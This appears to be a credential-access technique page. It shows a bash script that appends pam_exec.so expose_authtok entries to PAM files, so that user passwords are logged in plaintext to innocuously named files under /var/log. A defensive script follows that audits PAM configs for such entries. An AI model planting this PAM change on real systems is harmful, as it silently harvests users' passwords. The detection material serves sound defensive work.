Secondary Categories: 02-Credential Access
Each time a user authenticates or changes their password, it is logged in the log file we specified.
```bash
#!/bin/bash
# Create the log files
touch /var/log/systok.log
touch /var/log/syscommon.log
# Append pam_exec.so entries with expose_authtok to the common PAM files;
# the output of /bin/cat is written to the log files created above
echo "auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat" >> /etc/pam.d/common-auth
echo "auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat" >> /etc/pam.d/common-password
```
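To detect the entries appended above, a defender can audit PAM configuration for `pam_exec.so` lines that set `expose_authtok`. The script below is an added example, not part of the original page; the sample files are constructed, `notify-login` is a hypothetical benign hook, and the parser assumes the `/etc/pam.d` file format.

```shell
#!/bin/bash
# Added example: audit pam.d-style files for pam_exec.so entries that set
# expose_authtok (the module then hands the auth token to the command on stdin).

# audit_pam_dir DIR -> one line per finding: file:line:type:logfile:command
audit_pam_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk -v file="$(basename "$f")" '
            /^[ \t]*#/ { next }                       # ignore commented-out entries
            /pam_exec\.so/ && /expose_authtok/ {
                logf = "-"; cmd = "-"; seen = 0
                for (i = 1; i <= NF; i++) {
                    if ($i ~ /pam_exec\.so$/) { seen = 1; continue }
                    if (!seen) continue               # skip type and control fields
                    if ($i ~ /^log=/) logf = substr($i, 5)
                    else if ($i ~ /^\//) { cmd = $i; break }  # first absolute path is the command
                }
                print file ":" NR ":" $1 ":" logf ":" cmd
            }' "$f"
    done
}

# make_sample DIR -> writes constructed PAM files for the demo (not real system files)
make_sample() {
    cat > "$1/common-auth" <<'EOF'
auth [success=1 default=ignore] pam_unix.so nullok
auth required pam_exec.so expose_authtok log=/var/log/systok.log /bin/cat
EOF
    cat > "$1/common-password" <<'EOF'
password [success=1 default=ignore] pam_unix.so obscure yescrypt
auth required pam_exec.so expose_authtok log=/var/log/syscommon.log /bin/cat
EOF
    # notify-login is a hypothetical benign hook: no expose_authtok, so it is not flagged
    cat > "$1/sshd" <<'EOF'
# auth required pam_exec.so expose_authtok /bin/cat
session optional pam_exec.so /usr/local/bin/notify-login
EOF
}

sample="$(mktemp -d)"
make_sample "$sample"
audit_pam_dir "$sample"
rm -rf "$sample"
```

On a live host, run `audit_pam_dir /etc/pam.d` and review each reported command and log path; a match is a lead to investigate, since `expose_authtok` also has legitimate uses.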